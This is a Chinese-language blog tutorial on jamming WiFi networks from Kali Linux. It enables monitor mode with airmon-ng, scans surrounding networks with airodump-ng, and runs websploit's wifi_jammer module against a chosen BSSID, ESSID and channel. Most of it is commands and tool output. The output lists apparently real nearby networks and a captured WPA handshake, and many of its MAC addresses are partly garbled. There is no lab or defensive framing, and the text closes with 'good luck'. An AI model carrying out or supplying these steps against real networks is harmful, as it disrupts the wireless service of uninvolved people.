天天看點

kali下進行wifi幹擾

首先啟動混雜模式

ifconfig檢視interface

airmon-ng start wlan0

Found  processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e 
PID Name
    NetworkManager
    wpa_supplicant
    dhclient
    dhclient
    dhclient
Process with PID  (dhclient) is running on interface wlan2
Process with PID  (dhclient) is running on interface wlan0


Interface   Chipset     Driver

wlan2       Ralink  USB rt73usb - [phy9]
wlan0       Atheros AR9285  ath9k - [phy0]
                (monitor mode enabled on mon0)
           

然後airodump mon0

看到一大堆wifi

CH   ][ Elapsed:  s ][ -- : ][ WPA handshake: D4:EE::C:B:                                         

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 :A:D8:::E8  -                        e. WPA  CCMP   PSK  llp                                                        
 C8:A:::B:  -                        e  WPA  CCMP   PSK  Tenda_505B88                                               
 ::E4::A:  -                        e  WPA2 CCMP   PSK  USER_3004                                                  
 A0::E4::A:  -                        e  OPN              <length:  >                                               
 D4:EE::C:B:  -                        e  WPA2 CCMP   PSK  HiWiFi_1C4B92                                              
 C:E8::F7::  -                        e. WPA2 CCMP   PSK  JaydanKuk                                                  
 :BD:F::A1:D  -                        e. WPA2 CCMP   PSK  TP-LINK_A12D                                               
 ::::A8:F  -                         e. WPA2 CCMP   PSK  ZLINFENG_Network                                           
 08:::C:D7:F  -                         e  WPA2 CCMP   PSK  li3003                                                     
 ::E2:D:F2:C  -                        e  OPN              Coship_6DF22C                                              
 ::E2:D:A:D6  -                        e  OPN              Coship_1D4AD6                                              
 ::E2:D:E8:C  -                         e  OPN              Coship_6DE86C                                              
 ::::D6:D  -                        e. WPA2 CCMP   PSK                                                         
 ::E2::A5:  -                        e  WPA2 CCMP   PSK  Coship_3104                                                 
 A0::E4::BD:C  -                        e  OPN              <length:  >                                                
 :09::08::  -                        e  WPA2 CCMP   PSK  cngugu                                                      
 A::E4::BD:D  -                        e  WPA2 CCMP   PSK  USER_2802                                                   

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                            

 (not associated)   D4::0B::D:  -     -                                                                                  
 (not associated)   ::C:EE:F:  -     -                                                                                  
 D4:EE::C:B:  CC:AF:::FD:D        e-               HiWiFi_1C4B92                                                    
 C:E8::F7::  :B:BA:D::D4   -    0e-                     
           

打開另一個終端

啟動websploit

[email protected]:~# websploit 
WARNING: No route found for IPv6 destination :: (no default route?)

db   d8b   db d88888b d8888b. .d8888. d8888b. db       .d88b.  d888888b d888888b 
88   I8I   88 88'     88  `8D 88'  YP 88  `8D 88      .8P  Y8.   `88'   `~~88~~' 
88   I8I   88 88ooooo 88oooY' `8bo.   88oodD' 88      88    88    88       88    
Y8   I8I   88 88~~~~~ 88~~~b.   `Y8b. 88~~~   88      88    88    88       88    
`8b d8'8b d8' 88.     88   8D db   8D 88      88booo. `8b  d8'   .88.      88    
 `8b8' `8d8'  Y88888P Y8888P' `8888Y' 88      Y88888P  `Y88P'  Y888888P    YP    

        --=[WebSploit FrameWork
    +---**---==[Version :2.0.5 BETA
    +---**---==[Codename :We're Not Crying Wolf
    +---**---==[Available Modules : 19
        --=[Update Date : [r2.0.5-000 2.3.2014]
           

輸入use wifi/wifi_jammer

show options

然後設定頻道,essid,bssid

就是用airodump-ng掃出來的那些

選擇的自己目标

set bsssid 6C:E8:73:F7:19:98

set essid xxxxx

set channel 6

然後RUN

就會彈出幾個終端,已經開始幹擾了

good luck